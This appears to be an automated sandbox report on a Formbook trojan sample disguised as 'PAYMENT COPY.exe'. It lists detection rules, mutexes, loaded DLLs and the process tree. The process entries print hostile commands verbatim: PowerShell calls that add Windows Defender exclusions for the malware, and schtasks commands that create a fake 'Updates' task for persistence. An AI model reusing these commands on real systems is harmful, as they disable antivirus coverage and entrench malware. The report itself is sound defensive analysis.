Source: 0000000D.00000002.4945233762.0000000000860000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000013.00000002.4950914597.0000000004B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.2693537952.0000000002CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.4954573044.0000000005CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000002.2726398556.00000000033E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: PAYMENT COPY.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: bQrgcvrrXfGN.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, DXmpSuDxiAr5R4r1KM.cs	Security API names: _0020.SetAccessControl
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, DXmpSuDxiAr5R4r1KM.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, DXmpSuDxiAr5R4r1KM.cs	Security API names: _0020.AddAccessRule
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, O2SWHNtpZUOmUXTPuI.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, DXmpSuDxiAr5R4r1KM.cs	Security API names: _0020.SetAccessControl
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, DXmpSuDxiAr5R4r1KM.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, DXmpSuDxiAr5R4r1KM.cs	Security API names: _0020.AddAccessRule
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, O2SWHNtpZUOmUXTPuI.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: 10.2.bQrgcvrrXfGN.exe.2eff3dc.2.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.PAYMENT COPY.exe.2de4980.0.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.PAYMENT COPY.exe.2aaf3ac.1.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 10.2.bQrgcvrrXfGN.exe.3234a40.3.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.PAYMENT COPY.exe.5d30000.8.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.PAYMENT COPY.exe.2abf3c4.2.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@25/14@16/13

Source: C:\Users\user\Desktop\PAYMENT COPY.exe

File created: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7008:120:WilError_03
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6952:120:WilError_03
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Mutant created: \Sessions\1\BaseNamedObjects\GBGYKeQRubQCYdhkCufx
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7060:120:WilError_03

Source: C:\Users\user\Desktop\PAYMENT COPY.exe

File created: C:\Users\user\AppData\Local\Temp\tmp525.tmp

Jump to behavior

Source: PAYMENT COPY.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: PAYMENT COPY.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\PAYMENT COPY.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\PAYMENT COPY.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: gpresult.exe, 0000000D.00000003.2879415908.0000000000AF6000.00000004.00000020.00020000.00000000.sdmp, gpresult.exe, 0000000D.00000003.2882138422.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, gpresult.exe, 0000000D.00000003.2882138422.0000000000B17000.00000004.00000020.00020000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4945562552.0000000000B20000.00000004.00000020.00020000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4945562552.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4945562552.0000000000B17000.00000004.00000020.00020000.00000000.sdmp, gpresult.exe, 0000000D.00000003.2879546564.0000000000B17000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: PAYMENT COPY.exe	ReversingLabs: Detection: 91%
Source: PAYMENT COPY.exe	Virustotal: Detection: 41%

Source: C:\Users\user\Desktop\PAYMENT COPY.exe

File read: C:\Users\user\Desktop\PAYMENT COPY.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PAYMENT COPY.exe "C:\Users\user\Desktop\PAYMENT COPY.exe"
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT COPY.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bQrgcvrrXfGN" /XML "C:\Users\user\AppData\Local\Temp\tmp525.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process created: C:\Users\user\Desktop\PAYMENT COPY.exe "C:\Users\user\Desktop\PAYMENT COPY.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Process created: C:\Windows\SysWOW64\gpresult.exe "C:\Windows\SysWOW64\gpresult.exe"
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bQrgcvrrXfGN" /XML "C:\Users\user\AppData\Local\Temp\tmp1D60.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process created: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe "C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe"
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Process created: C:\Windows\SysWOW64\gpresult.exe "C:\Windows\SysWOW64\gpresult.exe"
Source: C:\Windows\SysWOW64\gpresult.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT COPY.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bQrgcvrrXfGN" /XML "C:\Users\user\AppData\Local\Temp\tmp525.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process created: C:\Users\user\Desktop\PAYMENT COPY.exe "C:\Users\user\Desktop\PAYMENT COPY.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bQrgcvrrXfGN" /XML "C:\Users\user\AppData\Local\Temp\tmp1D60.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process created: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe "C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe"	Jump to behavior
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Process created: C:\Windows\SysWOW64\gpresult.exe "C:\Windows\SysWOW64\gpresult.exe"	Jump to behavior
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Process created: C:\Windows\SysWOW64\gpresult.exe "C:\Windows\SysWOW64\gpresult.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: netutils.dll	Jump to behavior
